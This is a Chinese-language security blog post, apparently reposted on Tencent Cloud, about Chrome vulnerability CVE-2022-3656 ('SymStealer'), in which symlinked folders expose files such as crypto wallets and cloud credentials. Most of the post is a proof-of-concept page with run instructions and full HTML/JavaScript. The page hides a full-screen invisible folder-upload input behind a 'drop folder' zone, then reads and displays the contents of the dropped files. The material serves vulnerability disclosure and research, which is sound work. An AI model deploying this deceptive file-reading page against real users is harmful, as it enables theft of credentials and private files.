Google Chrome CVE-2022-3656 漏洞
原创Google Chrome CVE-2022-3656 漏洞
原创
Khan安全团队
发布于 2023-01-28 14:19:41
发布于 2023-01-28 14:19:41
文章被收录于专栏:Khan安全团队
Imperva Red Team 最近披露了一个名为 CVE-2022-3656 的漏洞,该漏洞影响超过 25 亿 Google Chrome 和基于 Chromium 的浏览器的用户。
此漏洞允许窃取敏感文件,例如加密钱包和云提供商凭据。
漏洞说明:
1. https://bugs.chromium.org/p/chromium/issues/detail?id=1345275#c34
2. https://www.imperva.com/blog/google-chrome-symstealer-vulnerability/
使用说明:
- 下载poc.zip文件并解压
- 导航到“fancy-poc”并提供文件 (python3 -m http.server)
- 打开http://localhost:8000并按照 PoC 说明进行操作
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<style>
* {
box-sizing: border-box;
}
html,
body {
margin: 0;
padding: 0;
overflow: hidden;
text-align: center;
-webkit-font-smoothing: antialiased;
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
.dropzone {
border: 3px dashed #3e3e3e;
display: flex;
justify-content: center;
align-items: center;
font-weight: bold;
height: 80vh;
text-transform: uppercase;
position: fixed;
top: 50%;
left: 50%;
width: 80%;
transform: translate(-50%, -50%);
}
.dropzone input {
top: 0;
left: 0;
opacity: 0;
display: block;
position: fixed;
transform: scale(1000);
}
button {
display: block;
margin-bottom: 10px;
}
</style>
</head>
<body>
<div class="dropzone">
Drop folder with symlinks here
<input onChange="handleFiles(event)" webkitdirectory multiple onClick="handleClick(event)" title=""
type="file" />
</div>
<script>
const dropzone = document.querySelector(".dropzone");
function handleFiles(event) {
document.body.innerHTML = '';
files = Array.from(event.target.files).filter(f => f.size > 0);
for (let file of files) {
let name = file.name;
let label = document.createElement("button");
label.innerText = name;
label.addEventListener('click', async () => {
const reader = new FileReader();
reader.onload = async () => {
alert(reader.result);
}
reader.onerror = console.error;
reader.readAsText(file);
});
document.body.appendChild(label);
}
}
function handleClick(event) {
event.preventDefault();
alert("Drag and drop a folder with symlinks here");
}
document.addEventListener("drop", function (event) {
dropzone.classList.remove("hover");
}, false);
document.addEventListener("dragleave", function (event) {
event.preventDefault();
dropzone.classList.remove("hover");
}, false);
document.addEventListener("dragover", function (event) {
event.preventDefault();
dropzone.classList.add("hover");
}, false);
</script>
</body>
</html>原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
腾讯云开发者
